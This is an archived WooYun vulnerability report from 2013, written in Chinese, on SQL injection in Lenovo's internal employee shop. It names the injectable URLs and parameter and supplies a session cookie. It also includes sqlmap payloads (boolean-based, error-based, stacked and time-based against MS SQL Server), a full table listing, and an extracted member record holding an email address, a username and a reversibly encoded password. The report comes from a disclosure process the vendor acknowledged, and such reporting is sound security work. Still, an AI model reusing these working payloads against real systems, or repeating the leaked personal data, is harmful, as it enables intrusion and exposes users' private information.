乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-25: 细节已通知厂商并且等待厂商处理中 2013-08-26: 厂商已经确认,细节仅向厂商公开 2013-09-05: 细节向核心白帽子及相关领域专家公开 2013-09-15: 细节向普通白帽子公开 2013-09-25: 细节向实习白帽子公开 2013-10-09: 细节向公众公开
漏洞好多PS:原来联想内部员工购买这么便宜,联想智能手机 A656卖1399,内购只要851;皮套卖149,内购只要34;保护壳卖55,内购只要9.5 内部团购比外面要便宜很多,价格水分真心大!
注射点:1.http://ess.lenovomobile.com/shopLst.aspx?RackCode=A112.http://ess.lenovomobile.com/shopLst.aspx?PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&EchoType=1&RackCode=A11这两枚都要登录状态的,所以可能不容易被发现吧。用这个cookie:ASP.NET_SessionId=h3t1sdbpwidnyd45y2ntf0ni (如果不行说明是失效了)
---Place: GETParameter: RackCode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: RackCode=A11' AND 9638=9638 AND 'NoGV'='NoGV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: RackCode=A11' AND 9922=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9922=9922) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(104)+CHAR(113))) AND 'lmYB'='lmYB Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: RackCode=A11'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: RackCode=A11' WAITFOR DELAY '0:0:5'-----
Database: lmshop[89 tables]+--------------------------+| EssCarDtl || EssCarMst || EssCmpRegiForm || EssFavorites || EssGoods || EssGoodsColor || EssGoodsPresent || EssGoodsPrice_Log || EssMember || EssOrder || EssSales || EssSalesGoods || EssSalesMail || EssVerifyCode || JB_QuickLogin || MailBasSet || MailSet || MailTemplate || MailToDtl || MailToGrp || MstCode || MstCsErr || MstCsLog || MstCsMenu || MstCsUser || MstMenu || MstMessage || MstRole || MstRoleMenu || MstRoleUser || MstUser || PmtActivities || PmtAttach || PmtAttendance || PmtFee || PmtGoods || PmtImg || PmtImgSize || PmtOrder || PmtOrderWithDraw || PmtPromoter || PmtQA || PmtSettle || PmtSettleDtl || PmtSettleOrder || PmtSettleOrderTmp || PmtSettleSim || PmtSettleSimDtl || PmtVerifyCode || RECEIVE || SEND || SellBigOrder || SellCustomize || SellJoinEnterprise || SellJoinPerson || ShopCard || SmsBasSet || SmsClass || SmsDueSend || SmsDueSendRec || SmsNormalIF || SmsNormalIFCC111021 || SmsNormalIfRec || SmsReceive || SmsReceiveType || SmsSend || SmsSend100601 || SmsSend100602 || SmsSendRec || SmsSysSet || SmsTempIF || SmsTempIfRec || SmsTemplate || SmsUserRight || SmsWhiteBlackBill || TrnFeedback || TrnNews || V_EssGoodsPrice || V_GetPayTypeByDistrictID || V_OrderGoodsType || V_PmtFee || V_UserMenu || ZSmsNormalIF100601 || ZSmsNormalIF110916 || ZSmsNormalIF111018 || bakUp_LMmbrid || dtproperties || pangolin_test_table || sms.SmsNormalIFCC |+--------------------------+
[13:58:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
[13:59:59] [INFO] fetching columns for table 'EssMember' in database 'lmshop'[14:00:06] [INFO] the SQL query used returns 12 entries[14:00:13] [INFO] retrieved: Email[14:00:20] [INFO] retrieved: varchar[14:00:27] [INFO] retrieved: IsValid[14:00:34] [INFO] retrieved: nvarchar[14:00:41] [INFO] retrieved: MbrID[14:00:47] [INFO] retrieved: bigint[14:00:54] [INFO] retrieved: MbrName[14:01:00] [INFO] retrieved: varchar[14:01:06] [INFO] retrieved: Password[14:01:12] [INFO] retrieved: nvarchar[14:01:19] [INFO] retrieved: Phone[14:01:26] [INFO] retrieved: nvarchar[14:01:33] [INFO] retrieved: RegDate[14:01:39] [INFO] retrieved: datetime[14:01:45] [INFO] retrieved: RegID[14:01:51] [INFO] retrieved: nvarchar[14:01:57] [INFO] retrieved: SalesCode[14:02:02] [INFO] retrieved: varchar[14:02:07] [INFO] retrieved: SalesID[14:02:13] [INFO] retrieved: bigint[14:02:18] [INFO] retrieved: UpdDate[14:02:23] [INFO] retrieved: datetime[14:02:29] [INFO] retrieved: UpdID[14:02:35] [INFO] retrieved: nvarchar[14:02:35] [INFO] fetching entries for table 'EssMember' in database 'lmshop'[14:02:41] [INFO] retrieved: 8203[14:02:41] [INFO] fetching number of distinct values for column 'Email'[14:02:47] [INFO] retrieved: 8196[14:02:47] [INFO] fetching number of distinct values for column 'MbrID'[14:02:53] [INFO] retrieved: 8203[14:02:53] [INFO] using column 'MbrID' as a pivot for retrieving row data[14:02:59] [INFO] retrieved: 1[14:03:05] [INFO] retrieved: [email protected][14:03:10] [INFO] retrieved:[14:03:16] [INFO] retrieved:[14:03:22] [INFO] retrieved:[14:03:27] [INFO] retrieved: 1[14:03:34] [INFO] retrieved: lihe[14:03:40] [INFO] retrieved: 05 20 2009 11:27AM[14:03:46] [INFO] retrieved: 1[14:03:52] [INFO] retrieved: 05 20 2009 11:27AM[14:03:57] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==
密码是base64有木有!!!这和明文有什么区别!!!
过滤啊
危害等级:高
漏洞Rank:20
确认时间:2013-08-26 01:33
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无